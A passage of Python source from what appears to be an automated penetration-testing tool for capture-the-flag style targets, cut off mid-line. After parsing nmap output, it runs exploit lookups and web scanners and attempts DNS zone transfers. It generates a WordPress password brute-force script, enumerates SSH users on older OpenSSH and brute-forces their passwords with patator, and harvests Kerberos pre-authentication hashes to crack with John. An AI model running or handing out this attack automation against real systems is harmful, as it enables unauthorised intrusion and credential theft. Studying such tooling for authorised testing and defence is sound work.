def Scan(self): """This Scan Funtion will take the parsed output from NmapParserFunk Class's output and attempt to run searchsploit against each service. Also, the HTTP-TITLE from nmap's script scans will be ran against searchsploit as oftentimes, a CMS's title may give away a vulnerable service or the CMS version itself.""" ntop = nmapParser.NmapParserFunk(self.target) ntop.openPorts() np = nmapParser.NmapParserFunk(self.target) np.allOpenPorts() ftp_product = list(sorted(set(merge(ntop.ftp_product, np.ftp_product)))) ssh_product = list(sorted(set(merge(ntop.ssh_product, np.ssh_product)))) smtp_product = list(sorted(set(merge(ntop.smtp_product, np.smtp_product)))) products = list(sorted(set(merge(ntop.all_products, np.all_products)))) http_title = ntop.http_script_title ignore = ["apache", "mysql", "microsoft"] commands_to_run = [] c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) ### FTP searchsploit product ### if len(ftp_product) == 1: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) string_ftp = " ".join(map(str, ftp_product)) lowercase_string_ftp = str(string_ftp).lower() ftp_cmd = c.getCmd("vuln", "searchsploit", strang=lowercase_string_ftp, name="ftp") commands_to_run.append(ftp_cmd) #### SSH searchsploit product ### if len(ssh_product) == 1: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) string_ssh = " ".join(map(str, ssh_product)) lowercase_string_ssh = str(string_ssh).lower() ssh_cmd = c.getCmd("vuln", "searchsploit", strang=lowercase_string_ssh, name="ssh") commands_to_run.append(ssh_cmd) #### SMTP searchsploit product ### if len(smtp_product) == 1: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) string_smtp = " ".join(map(str, smtp_product)) lowercase_string_smtp = str(string_smtp).lower() smtp_cmd = c.getCmd("vuln", "searchsploit", strang=lowercase_string_smtp, name="smtp") commands_to_run.append(smtp_cmd) #### HTTP Title searchsploit (hoping for CMS in title) ########## if len(http_title) >= 1: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) if len(http_title) > 1: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) for title in http_title: string_title = " ".join(map(str, title)) lowercase_title = str(string_title).lower() if lowercase_title.find("redirect") != -1: pass elif lowercase_title.find("site doesn't have a title") != -1: pass elif lowercase_title.find("apache2") != -1: pass elif lowercase_title.find("nginx") != -1: pass else: first_word = lowercase_title.split(" ", 1)[0] first_two_words = " ".join(lowercase_title.replace("[", "").replace("]", "").replace("\n", " ").replace("'", "").split(" ", 2)[0:2]) http_cmd = c.getCmd("vuln", "searchsploit", strang=str(first_two_words), name="http-title") http_cmd2 = c.getCmd("vuln", "searchsploit", strang=first_word, name=f"{first_word}") commands_to_run.append(http_cmd) commands_to_run.append(http_cmd2) else: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) string_title = " ".join(map(str, http_title)) lowercase_title = str(string_title).lower() if lowercase_title.find("redirect") != -1: pass elif lowercase_title.find("site doesn't have a title") != -1: pass elif lowercase_title.find("apache2") != -1: pass elif lowercase_title.find("nginx") != -1: pass else: first_word = lowercase_title.split(" ", 1)[0] first_two_words = " ".join(lowercase_title.replace("[", "").replace("]", "").replace("\n", " ").replace("'", "").split(" ", 2)[0:2]) http_cmd = c.getCmd("vuln", "searchsploit", strang=str(first_two_words), name="http-title") http_cmd2 = c.getCmd("vuln", "searchsploit", strang=first_word, name=f"{first_word}") commands_to_run.append(http_cmd) commands_to_run.append(http_cmd2) if len(products) != 0: if not os.path.exists(c.getPath("vuln", "vulnDir")): os.makedirs(c.getPath("vuln", "vulnDir")) for p in products: lowercase_product = str(p).lower() fw = lowercase_product.split(" ", 1)[0] if not lowercase_product: pass if not fw: pass else: if lowercase_product in ignore: pass if fw in ignore: pass else: product_cmd2 = c.getCmd("vuln", "searchsploit", strang=lowercase_product, name="all-services") product_cmd4 = c.getCmd("vuln", "searchsploit", strang=str(fw), name="all-services") commands_to_run.append(product_cmd2) commands_to_run.append(product_cmd4) sorted_cmds = sorted(set(commands_to_run)) commands_to_run = [i for i in sorted_cmds] self.processes = tuple(commands_to_run) if len(commands_to_run) != 0: print(f"[{fg.li_yellow}+{fg.rs}] {fg.li_cyan}SEARCHING FOR EXPLOITS {fg.rs}")
def getUdpPorts(self): """Helper Function to parse UDP ports.""" udp = nmapParser.NmapParserFunk(self.target) udp.openUdpPorts()
def Scan(self): """Enumerate Web Server ports based on nmaps output. This function will run the following tools; WhatWeb, WafW00f, Dirsearch, Nikto, and curl robots.txt""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() http_ports = np.http_ports system_type = np.os_system_type if len(http_ports) == 0: pass else: hl = helper_lists.IgnoreHttpPorts() _http_ports = [x for x in http_ports if x not in hl.ignore_http_ports] print(f"""{fg.li_cyan}Enumerating HTTP Ports! {fg.rs}""") c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) dn = domainFinder.DomainFinder(self.target) dn.getRedirect() hostnames = sorted(set(a.lower() for a in dn.redirect_hostname)) if not os.path.exists(c.getPath("web", "webDir")): os.makedirs(c.getPath("web", "webDir")) if not os.path.exists(c.getPath("web", "aquatoneDir")): os.makedirs(c.getPath("web", "aquatoneDir")) commands = [] another_array_of_hostnames = [] if hostnames: for d in hostnames: another_array_of_hostnames.append(d) if another_array_of_hostnames: vhc = vhostCrawl.checkSource(self.target, hostnames=another_array_of_hostnames) vhc.getLinks() htb_source_domains = vhc.htb_source_domains if htb_source_domains: for d in htb_source_domains: another_array_of_hostnames.append(d) sorted_hostnames = sorted(set(a.lower() for a in another_array_of_hostnames)) self.check_links(sorted_hostnames, http_ports) for hostname in sorted_hostnames: for port in _http_ports: commands.append(c.getCmd("web", "niktoHost", host=hostname, port=port)) commands.append(c.getCmd("web", "whatwebHttpHost", host=hostname, port=port)) commands.append(c.getCmd("web", "wafw00fHost", host=hostname, port=port)) commands.append(c.getCmd("web", "curlRobotsHost", host=hostname, port=port)) if system_type: if system_type[0] == "Windows": commands.append(c.getCmd("web", "dirsearchHttpHostDictWindows", host=hostname, port=port)) robots_check = check_robots.ParseRobots(self.target, port, althost=hostname) disallowed_dirs = robots_check.interesting_dirs() if disallowed_dirs: for _dir in disallowed_dirs: commands.append(c.getCmd("web", "dirsearchHostDisallowedWindows", host=hostname, port=port, dirname=_dir)) if system_type[0] == "Linux": commands.append(c.getCmd("web", "dirsearchHttpHostDict", host=hostname, port=port)) robots_check = check_robots.ParseRobots(self.target, port, althost=hostname) disallowed_dirs = robots_check.interesting_dirs() if disallowed_dirs: for _dir in disallowed_dirs: commands.append(c.getCmd("web", "dirsearchHostDisallowed", host=hostname, port=port, dirname=_dir)) else: commands.append(c.getCmd("web", "dirsearchHttpHostDict", host=hostname, port=port)) robots_check = check_robots.ParseRobots(self.target, port, althost=hostname) disallowed_dirs = robots_check.interesting_dirs() if disallowed_dirs: for _dir in disallowed_dirs: commands.append(c.getCmd("web", "dirsearchHostDisallowed", host=hostname, port=port, dirname=_dir)) else: for port in _http_ports: commands.append(c.getCmd("web", "niktoTarget", port=port)) commands.append(c.getCmd("web", "whatwebHttpTarget", port=port)) commands.append(c.getCmd("web", "wafw00fTarget", port=port)) commands.append(c.getCmd("web", "curlRobotsTarget", port=port)) if system_type: if system_type[0] == "Windows": commands.append(c.getCmd("web", "dirsearchHttpTargetDictWindows", port=port)) robots_check = check_robots.ParseRobots(self.target, port) disallowed_dirs = robots_check.interesting_dirs() if disallowed_dirs: for _dir in disallowed_dirs: commands.append(c.getCmd("web", "dirsearchDisallowedWindows", port=port, dirname=_dir)) if system_type[0] == "Linux": commands.append(c.getCmd("web", "dirsearchHttpTargetDict", port=port)) robots_check = check_robots.ParseRobots(self.target, port) disallowed_dirs = robots_check.interesting_dirs() if disallowed_dirs: for _dir in disallowed_dirs: commands.append(c.getCmd("web", "dirsearchDisallowed", port=port, dirname=_dir)) else: commands.append(c.getCmd("web", "dirsearchHttpTargetDict", port=port)) robots_check = check_robots.ParseRobots(self.target, port) disallowed_dirs = robots_check.interesting_dirs() if disallowed_dirs: for _dir in disallowed_dirs: commands.append(c.getCmd("web", "dirsearchDisallowed", port=port, dirname=_dir)) # sorted_cmds = sorted(set(commands), reverse=True) # commands_to_run = [i for i in sorted_cmds] self.processes = tuple(commands)
def proxyCMS(self): """If a Content Management System is discovered on the web from enumProxy's output, Then proceed to try and enumerate the CMS further. CMS Scanners to be scanned are limited to: Drupal, Wordpress, Joomla, Magento, Tomcat, and Apache WebDav""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() npp = nmapParser.NmapParserFunk(self.target) npp.openProxyPorts() proxy_http_ports = npp.proxy_http_ports proxy_ports = np.proxy_ports teal = fg.li_cyan hasPrinted = False cms_commands = [] cms_counter = 0 reset = fg.rs if len(proxy_http_ports) == 0: pass if len(proxy_ports) == 0: pass else: c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) for proxy in proxy_ports: for proxy_http_port in proxy_http_ports: whatweb_files = [] wordpress_url = [] wp = helper_lists.Wordpress(self.target) wordpressDirs = wp.wordpress_dirs if os.path.exists(c.getPath("proxy", "aquatoneDirProxyUrls")): try: with open(c.getPath("proxy", "aquatoneDirProxyUrls"), "r") as purls: for url in purls: uline = url.rstrip() for word in wordpressDirs: if word in uline: wordpress_url.append(uline) except FileNotFoundError as fnf_error: print(fnf_error) exit() sorted_wp_links = sorted(set(wordpress_url)) count = 0 if len(sorted_wp_links) != 0: for wpdir in sorted_wp_links: count += 1 try: # whatweb_proxy_cmd = f"""whatweb -v -a 3 --proxy {self.target}:{proxy_ports[0]} {wpdir} > {c.getPath("reportDir")}/proxy/web/whatweb-proxy-{proxy_http_port}-{count}.txt""" whatweb_proxy_cmd = c.getCmd("proxy", "whatwebProxyWP", proxyPorts=proxy, wordpressDirs=wpdir, httpProxy=proxy_http_port, count=count) call(whatweb_proxy_cmd, shell=True) if count >= 2: break except CalledProcessError: pass # this will handle errors in the called executable. except OSError: pass dir_list = [ d for d in glob.iglob(c.getPath("proxy", "proxyGlob"), recursive=True) if os.path.isdir(d) ] for d in dir_list: reportFile_list = [ fname for fname in glob.iglob(f"{d}/*", recursive=True) if os.path.isfile(fname) ] for rf in reportFile_list: if "nmap" not in rf: if "whatweb" in rf: if str(proxy_http_port) in rf: whatweb_files.append(rf) if len(whatweb_files) != 0: for i in whatweb_files: cms_strings = [ "WordPress", "Magento", "tomcat", "WebDAV", "Drupal", "Joomla", ] with open(i, "r") as wwf: for word in wwf: fword = ( word.replace("[", " ") .replace("]", " ") .replace(",", " ") ) for cms in cms_strings: if cms in fword: if "WordPress" in cms and not hasPrinted: print(f"{teal}Found WordPress!{reset}") cms_counter += 1 if len(sorted_wp_links) != 0: for wpLink in sorted_wp_links: wpscan_cmd = c.getCmd("proxy", "wpscanProxy", sortedWpDirs=wpLink, httpProxy=proxy, httpProxyPort=proxy_http_port) cms_commands.append(wpscan_cmd) if cms_counter >= 1: hasPrinted = True break manual_brute_force_script = f""" #!/bin/bash if [[ -n $(grep -i "User(s) Identified" {c.getPath("proxy", "wpscanReport", proxyPort=proxy_http_port)}) ]]; then grep -w -A 100 "User(s)" {c.getPath("proxy", "wpscanReport", proxyPort=proxy_http_port)} | grep -w "[+]" | cut -d " " -f 2 | head -n -7 >{c.getPath("proxy", "wpUsers")} {c.getCmd("proxy", "proxychainsCewl", proxyPorts=proxy_http_port)} sleep 10 echo "Adding John Rules to Cewl Wordlist!" {c.getCmd("proxy", "john")} sleep 3 # brute force again with wpscan {c.getCmd("proxy", "wpscanCewlBrute", proxyPorts=proxy_http_port, httpProxy=proxy)} sleep 1 if grep -i "No Valid Passwords Found" wordpress-cewl-brute2.txt; then if [ -s {c.getPath("proxy", "johnCewl")} ]; then {c.getCmd("proxy", "wpscanJohnCewlBrute", proxyPorts=proxy_http_port, httpProxy=proxy)} else echo "John wordlist is empty :(" fi sleep 1 if grep -i "No Valid Passwords Found" {c.getPath("proxy","wpscanJohnCoolBrute")}; then {c.getCmd("proxy", "wpscanFastTrackBrute", proxyPorts=proxy_http_port, httpProxy=proxy)} fi fi fi """ try: with open(c.getPath("proxy", "wordpressBashBruteScript"), "w") as wpb: print("Creating wordpress Brute Force Script...") wpb.write(manual_brute_force_script) call(f"""chmod +x {c.getPath("proxy", "wordpressBashBruteScript")}""", shell=True) except FileNotFoundError as fnf_error: print(fnf_error) if "Drupal" in cms: drupal_cmd = c.getCmd("proxy", "droopescan", proxyPorts=proxy_http_port) cms_commands.append(drupal_cmd) if "Joomla" in cms: joomla_cmd = c.getCmd("proxy", "joomscan", proxyPorts=proxy_http_port, httpProxy=proxy) cms_commands.append(joomla_cmd) if "Magento" in cms: magento_cmd = c.getCmd("proxy", "magescan", proxyPorts=proxy_http_port) cms_commands.append(magento_cmd) if "WebDAV" in cms or ("Microsoft-IIS 6.0" in cms): webdav_cmd2 = c.getCmd("proxy", "webdavNmap", proxyPort=proxy_http_port) cms_commands.append(webdav_cmd2) sorted_commands = sorted(set(cms_commands)) commands_to_run = [] for i in sorted_commands: commands_to_run.append(i) mpCmds = tuple(commands_to_run) self.cms_processes = mpCmds
def Scan(self): """This Scan Function will proceed to enumerate all the remaining services found by nmaps fullTcpScan results. The following services will be enumerated if their respective ports are open. FTP, SMTP, NFS, RPC, TELNET, SIP, VNC, CUPS, MSSQL, MYSQL, CASSANDRA, MONGODB, POP3 SNMP, AND KERBEROS.""" ntop = nmapParser.NmapParserFunk(self.target) ntop.openPorts() np = nmapParser.NmapParserFunk(self.target) np.allOpenPorts() ftpPorts = list(sorted(set(merge(np.ftp_ports, ntop.ftp_ports)))) smtpPorts = list(sorted(set(merge(ntop.smtp_ports, np.smtp_ports)))) nfsPorts = list(sorted(set(merge(ntop.nfs_ports, np.nfs_ports)))) # rpcPorts = list(sorted(set(merge(ntop.rpc_ports, np.rpc_ports)))) telnetPorts = list( sorted(set(merge(ntop.telnet_ports, np.telnet_ports)))) sipPorts = list(sorted(set(merge(ntop.sip_ports, np.sip_ports)))) vncPorts = list(sorted(set(merge(ntop.vnc_ports, np.vnc_ports)))) cupsPorts = list(sorted(set(merge(ntop.cups_ports, np.cups_ports)))) javaRmiPorts = list( sorted(set(merge(ntop.java_rmi_ports, np.java_rmi_ports)))) mssqlPorts = list(sorted(set(merge(ntop.mssql_ports, np.mssql_ports)))) mysqlPorts = list(sorted(set(merge(ntop.mysql_ports, np.mysql_ports)))) cassandraPorts = list( sorted(set(merge(ntop.cassandra_ports, np.cassandra_ports)))) mongoPorts = list(sorted(set(merge(ntop.mongo_ports, np.mongo_ports)))) pop3Ports = list(sorted(set(merge(ntop.pop3_ports, np.pop3_ports)))) kerberosPorts = list( sorted(set(merge(ntop.kerberos_ports, np.kerberos_ports)))) fingerPorts = list( sorted(set(merge(ntop.finger_ports, np.finger_ports)))) tcpPorts = list(sorted(set(merge(ntop.tcp_ports, np.tcp_ports)))) string_tcp_ports = ",".join(map(str, tcpPorts)) unp = nmapParser.NmapParserFunk(self.target) unp.openUdpPorts() snmpPorts = unp.snmp_ports ikePorts = unp.ike_ports c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) unsorted_commands = [] unsorted_commands.append( c.getCmd("nmap", "nmapVulners", openTcpPorts=string_tcp_ports)) if snmpPorts: if not os.path.exists(c.getPath("snmp", "snmpDir")): os.makedirs(c.getPath("snmp", "snmpDir")) unsorted_commands.append(c.getCmd("snmp", "snmpwalk")) unsorted_commands.append(c.getCmd("snmp", "snmpCheck")) unsorted_commands.append(c.getCmd("snmp", "onesixtyone")) if ikePorts: unsorted_commands.append(c.getCmd("ike", "ikescan")) unsorted_commands.append(c.getCmd("ike", "ikescan4500")) unsorted_commands.append(c.getCmd("ike", "nmapIke")) if ftpPorts: string_ftp_ports = ",".join(map(str, ftpPorts)) unsorted_commands.append( c.getCmd("ftp", "nmapFtp", ftpPorts=string_ftp_ports)) if fingerPorts: if not os.path.exists(c.getPath("finger", "fingerDir")): os.makedirs(c.getPath("finger", "fingerDir")) for p in fingerPorts: unsorted_commands.append( c.getCmd("finger", "fingerUserEnum", p=p)) if smtpPorts: if not os.path.exists(c.getPath("smtp", "smtpDir")): os.makedirs(c.getPath("smtp", "smtpDir")) for p in smtpPorts: unsorted_commands.append(c.getCmd("smtp", "smtpUserEnum", p=p)) if nfsPorts: if not os.path.exists(c.getPath("nfs", "nfsDir")): os.makedirs(c.getPath("nfs", "nfsDir")) string_nfs_ports = ",".join(map(str, nfsPorts)) unsorted_commands.append( c.getCmd("nfs", "nmapNfs", nfsPorts=string_nfs_ports)) unsorted_commands.append(c.getCmd("nfs", "showmount")) # if rpcPorts: # if not os.path.exists(c.getPath("rpc", "rpcDir")): # os.makedirs(c.getPath("rpc", "rpcDir")) # if not os.path.exists(c.getPath("smb", "smbScan")): # unsorted_commands.append(c.getCmd("rpc", "enum4linuxRpc")) # if which("impacket-rpcdump"): # unsorted_commands.append(c.getCmd("rpc", "rpcdump")) if cupsPorts: string_cups_ports = ",".join(map(str, cupsPorts)) unsorted_commands.append( c.getCmd("cups", "nmapCups", cupsPorts=string_cups_ports)) if javaRmiPorts: string_java_rmi_ports = ",".join(map(str, javaRmiPorts)) unsorted_commands.append( c.getCmd("java", "javaRmiDump", javarmiPorts=string_java_rmi_ports)) unsorted_commands.append( c.getCmd("java", "javaRmiVulns", javarmiPorts=string_java_rmi_ports)) if sipPorts: if not os.path.exists(c.getPath("sip", "sipDir")): os.makedirs(c.getPath("sip", "sipDir")) string_sip_ports = ",".join(map(str, sipPorts)) unsorted_commands.append( c.getCmd("sip", "nmapSip", sipPorts=string_sip_ports)) unsorted_commands.append(c.getCmd("sip", "svwar")) if vncPorts: string_vnc_ports = ",".join(map(str, vncPorts)) unsorted_commands.append( c.getCmd("vnc", "nmapVnc", vncPorts=string_vnc_ports)) if telnetPorts: string_telnet_ports = ",".join(map(str, telnetPorts)) unsorted_commands.append( c.getCmd("telnet", "nmapTelnet", telnetPorts=string_telnet_ports)) if cassandraPorts: string_cassandra_ports = ",".join(map(str, cassandraPorts)) unsorted_commands.append( c.getCmd("cassandra", "nmapCassandra", cassandraPorts=string_cassandra_ports)) if mssqlPorts: string_mssql_ports = ",".join(map(str, mssqlPorts)) unsorted_commands.append( c.getCmd("mssql", "nmapMssql", mssqlPorts=string_mssql_ports, mssqlPort=mssqlPorts[0])) if mysqlPorts: string_mysql_ports = ",".join(map(str, mysqlPorts)) unsorted_commands.append( c.getCmd("mysql", "nmapMysql", mysqlPorts=string_mysql_ports)) if mongoPorts: string_mongo_ports = ",".join(map(str, mongoPorts)) unsorted_commands.append( c.getCmd("mongodb", "nmapMongo", mongoPorts=string_mongo_ports)) if pop3Ports: string_pop3_ports = ",".join(map(str, pop3Ports)) unsorted_commands.append( c.getCmd("pop3", "nmapPop3", popPorts=string_pop3_ports)) if kerberosPorts: string_kerberos_ports = ",".join(map(str, kerberosPorts)) unsorted_commands.append( c.getCmd("kerberos", "nmapKerberos", kerberosPorts=string_kerberos_ports)) kirby = kerbEnum.KerbEnum(self.target) kirby.PwnWinRM() set_sorted_cmds = sorted(set(unsorted_commands)) cmds_to_run = [] for i in set_sorted_cmds: cmds_to_run.append(i) self.processes = tuple(cmds_to_run)
def CewlWordlist(self): np = nmapParser.NmapParserFunk(self.target) np.openPorts() http_ports = np.http_ports htports = [] if len(http_ports) == 1: htports.append(http_ports[0]) ssl_ports = np.ssl_ports slports = [] if len(ssl_ports) == 1: slports.append(ssl_ports[0]) c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if os.path.exists(c.getPath("web", "aquatoneDirUrls")): if not os.path.exists(c.getPath("wordlists", "wordlistsDir")): os.makedirs(c.getPath("wordlists", "wordlistsDir")) url_list = [] urls_file = c.getPath("web", "aquatoneDirUrls") if os.path.exists(urls_file): try: with open(urls_file, "r") as uf: for line in uf: if "index.html" in line: url_list.append(line.rstrip()) if "index.php" in line: url_list.append(line.rstrip()) if len(htports) == 1: url_list.append(f"http://{self.target}:{htports[0]}/") if len(slports) == 1: url_list.append(f"https://{self.target}:{slports[0]}/") wordlist = sorted(set(url_list)) except FileNotFoundError as fnf_error: print(fnf_error) exit() cewl_cmds = [] if len(wordlist) != 0: counter = 0 for url in wordlist: counter += 1 cewl_cmds.append( f"""cewl {url} -m 3 -w {c.getPath("wordlists","CewlCounter", counter=counter)}""" ) if len(cewl_cmds) != 0: try: for cmd in cewl_cmds: call(cmd, shell=True) except ConnectionRefusedError as cre_error: print(cre_error) words = [] try: with open(c.getPath("wordlists", "CustomPass1575"), "r") as prob: for line in prob: words.append(line.rstrip()) for wl in os.listdir(c.getPath("wordlists", "wordlistsDir")): wlfile = f"""{c.getPath("wordlists","wordlistsDir")}/{wl}""" with open(wlfile, "r") as wlf: for line in wlf: words.append(line.rstrip()) set_unique_words = sorted(set(words)) unique_words = list(set_unique_words) with open(c.getPath("wordlists", "CewlPlus"), "a") as allwls: string_words = "\n".join(map(str, unique_words)) allwls.write(str(string_words)) except FileNotFoundError as fnf_error: print(fnf_error)
def GetHostNames(self): """This Function is for HTTPS/SSL enumWebSSL Class to enumerate found hostnames.""" np = nmapParser.NmapParserFunk(self.target) np.openPorts() ssl_ports = np.ssl_ports dnsPort = np.dns_ports c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) ig = helper_lists.ignoreDomains() ignore = ig.ignore allsortedhostnameslist = [] dns = [] try: with open(c.getPath("nmap", "nmap_top_ports_nmap"), "r") as nm: for line in nm: new = (line.replace("=", " ").replace("/", " ").replace( "commonName=", "").replace("/organizationName=", " ").replace(",", " ").replace("_", " ")) matches = re.findall( r"(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{3,6}", new) for x in matches: if not any(s in x for s in ignore): dns.append(x) sdns = sorted(set(dns)) tmpdns = [] for x in sdns: tmpdns.append(x.lower()) except FileNotFoundError as fnf_error: print(fnf_error) exit() ################# SSLSCAN ####################### if len(ssl_ports) == 0: tmpdns2 = [] for x in tmpdns: tmpdns2.append(x.lower()) unsortedhostnames = [] for x in tmpdns2: unsortedhostnames.append(x.lower()) allsortedhostnames = sorted(set(tmpdns2)) for x in allsortedhostnames: allsortedhostnameslist.append(x.lower()) else: for sslport in ssl_ports: if not os.path.exists( c.getPath( "webSSL", "webSSLScanTarget", sslport=sslport)): pass else: sslscanFile = c.getPath("webSSL", "webSSLScanTarget", sslport=sslport) domainName = [] altDomainNames = [] with open(sslscanFile, "rt") as f: for line in f: if "Subject:" in line: n = line.lstrip("Subject:").rstrip("\n") na = n.lstrip() if na not in ignore: domainName.append(na) if "Altnames:" in line: alnam = line.lstrip("Altnames:").rstrip("\n") alname = alnam.lstrip() alname1 = alname.lstrip("DNS:") alname2 = (alname1.replace("DNS:", "").replace( ",", "").split()) for x in alname2: if x not in ignore: altDomainNames.append(x) if (line.rstrip("\n") == "TLS 1.2 vulnerable to heartbleed" or (line.rstrip("\n") == "TLS 1.1 vulnerable to heartbleed") or (line.rstrip("\n") == "TLS 1.0 vulnerable to heartbleed")): self.heartbleed = True both = [] for x in domainName: both.append(x.lower()) for x in altDomainNames: both.append(x.lower()) tmpdns2 = [] ignore_chars_regex = re.compile(r"[@_!#$%^&*()<>?/\|}{~:]") for x in both: if ignore_chars_regex.search(x) is None: tmpdns2.append(x.lower()) for x in tmpdns: tmpdns2.append(x.lower()) unsortedhostnames = [] for x in tmpdns2: unsortedhostnames.append(x.lower()) allsortedhostnames = sorted(set(tmpdns2)) allsortedhostnameslist = [] for x in allsortedhostnames: allsortedhostnameslist.append(x.lower()) if len(dnsPort) == 0: if len(allsortedhostnameslist) != 0: for x in allsortedhostnameslist: self.hostnames.append(x.lower()) else: ######## Check For Zone Transfer ############### if not os.path.exists(c.getPath("dns", "dnsDir")): os.makedirs(c.getPath("dns", "dnsDir")) dig_cmd = f"""dig -x {self.target} @{self.target}""" dp = dig_parser.digParse(self.target, dig_cmd) dp.parseDig() dig_hosts = dp.hosts sub_hosts = dp.subdomains if len(dig_hosts) != 0: for x in dig_hosts: self.hostnames.append(x.lower()) if len(sub_hosts) != 0: for x in sub_hosts: self.hostnames.append(x.lower()) if len(self.hostnames) != 0: alldns = " ".join(map(str, self.hostnames)) zonexferDns = [] dig_command = f"""dig axfr @{self.target} {alldns}""" dp2 = dig_parser.digParse(self.target, dig_command) dp2.parseDigAxfr() subdomains = dp2.subdomains for x in subdomains: zonexferDns.append(x.lower()) sortedAllDomains = sorted(set(zonexferDns)) for x in sortedAllDomains: self.hostnames.append(x.lower())
def SshUsersBrute(self): """If OpenSSH is in the service banner and < 7.7 from nmapParser's results. Then enumerate valid usernames from SSH using a small wordlist of around 600 common names. If a valid Username is found that isn't in the list of default linux / windows usernames, from autorecon.utils/helper_lists.py. Proceed to brute force that usernames password with patator using Seclists probable top 1575.txt wordlist with a few custom added passwords.""" cmd_info = "[" + fg.green + "+" + fg.rs + "]" cmd_info_orange = "[" + fg.li_yellow + "+" + fg.rs + "]" c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) dlu = helper_lists.DefaultLinuxUsers(self.target) default_linux_users = dlu.default_linux_users cl = helper_lists.Cewl(self.target) if not os.path.exists(c.getPath("wordlists", "CewlPlus")): cl.CewlWordlist() blue = fg.li_blue green = fg.li_green yellow = fg.li_yellow red = fg.red teal = fg.li_cyan reset = fg.rs np = nmapParser.NmapParserFunk(self.target) np.openPorts() ssh_product = np.ssh_product ssh_version = np.ssh_version string_ssh_version = " ".join(map(str, ssh_version)) lowercase_ssh_version = str(string_ssh_version).lower() first_two_nums = lowercase_ssh_version[0:3] int_first_two_nums = float(first_two_nums) if ssh_product[0] == "OpenSSH": if int_first_two_nums < float(7.7): if not os.path.exists(c.getPath("ssh", "sshDir")): os.makedirs(c.getPath("ssh", "sshDir")) cmd = c.getCmd("ssh", "ssh_user_enum", port=self.port) print(cmd_info, cmd) print("This may take a few minutes.") try: call(cmd, shell=True) except ConnectionRefusedError as cre_error: print(cre_error) exit() try: with open(c.getPath("ssh", "ssh_usernames"), "r") as json_file: data = json.load(json_file) num_valid_users = len(data["Valid"]) if num_valid_users < 55: for valid in data["Valid"]: if valid not in default_linux_users: print( f"""{cmd_info} {teal}Unique User Found!{reset} {green}{valid}{reset}""" ) self.unique_users.append(valid) else: print(f"""{cmd_info} """ + valid) else: print( f"""OpenSSH returned too many false positives: {num_valid_users}""" ) except FileNotFoundError as fnf_error: print(fnf_error) exit() if len(self.unique_users) > 0 and (len(self.unique_users) < 4): if os.path.exists(c.getPath("wordlists", "CewlPlus")): if os.path.getsize(c.getPath("wordlists", "CewlPlus")) > 0: for u in self.unique_users: print( f"""{teal}Beginning Password Brute Force for User: {reset} {green}{u}{reset}""" ) patator_cmd = c.getCmd("ssh", "patator_ssh_cewl_auto", port=self.port, user=u) print(f"""{cmd_info} {patator_cmd}""") call(patator_cmd, shell=True) else: for u in self.unique_users: print( f"""{teal}Beginning Password Brute Force for User: {reset} {green}{u}{reset}""" ) patator_cmd = c.getCmd("ssh", "patator_ssh_auto", port=self.port, user=u) print(f"""{cmd_info} {patator_cmd}""") call(patator_cmd, shell=True) else: print( f"""{blue}{ssh_product[0]} {ssh_version[0]}{reset} is {red}NOT{reset} vulnerable to User Enumeration""" ) print( f"""If you still want to brute force SSH, Consider using a tool such as Hydra or Patator manually.""" ) print(f"""For example""") print( f"""{cmd_info_orange}{yellow} {c.getCmd("ssh","patator_ssh_auto", port=self.port, user="******")} {reset}""" )
def PwnWinRM(self): np = nmapParser.NmapParserFunk(self.target) np.openPorts() ldap_ports = np.ldap_ports if len(ldap_ports) == 0: pass else: c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) def parse_users(): """ Returns a list of users """ if not os.path.exists(c.getPath("wordlists", "wordlistsDir")): os.makedirs(c.getPath("wordlists", "wordlistsDir")) users_list = [] user_obj = self.ldapper.get_all_users() with open(c.getPath("wordlists", "ldapUsernames"), "w+") as userlist_file: if user_obj: for user in user_obj: users_list.append(user['sAMAccountName']) userlist_file.write(user['sAMAccountName'] + "\n") return users_list else: return None def check_parse_hashes(): print(f"[{fg.li_magenta}+{fg.rs}] Creating List of Valid Usernames") users = parse_users() print(f"[{fg.li_green}+{fg.rs}] Checking for Kerberos Pre-Authentication TGT Hashes") domain = self.ldapper.get_domain() hashes = [] if domain and users: for u in users: try: hashes.append(self.ldapper.get_tgt(u)) except Exception as e: print(e) if hashes: print(f"Found tgt hashes {hashes}") if not os.path.exists(c.getPath("loot", "lootDir")): os.makedirs(c.getPath("loot", "lootDir")) with open(c.getPath("loot", "krbHashes"), "w") as hash_file: if hashes: for i in hashes: hash_file.write(i.rstrip() + "\n") return hashes def HeresJonny(): krb_hashes = check_parse_hashes() if krb_hashes: print(f"[{fg.li_magenta}+{fg.rs}] Found krb hash!") print(f"[{fg.li_magenta}+{fg.rs}] BruteForcing The Hash!") john_cmd = c.getCmd("john", "jcrack", hashfile=f"{c.getPath('loot', 'krbHashes')}") call(john_cmd, shell=True) return True else: return False def parseCreds(): def cmdline(command): process = Popen(args=command, stdout=PIPE, shell=True) return process.communicate()[0] john_show_cmd = c.getCmd("john", "jshow", hashfile=f"{c.getPath('loot', 'krbHashes')}") john_show_output = [i.strip() for i in cmdline(john_show_cmd).decode("utf-8").split("\n")] num_cracked = [int(p[0]) for p in sorted(set(i for i in john_show_output if "password hash cracked," 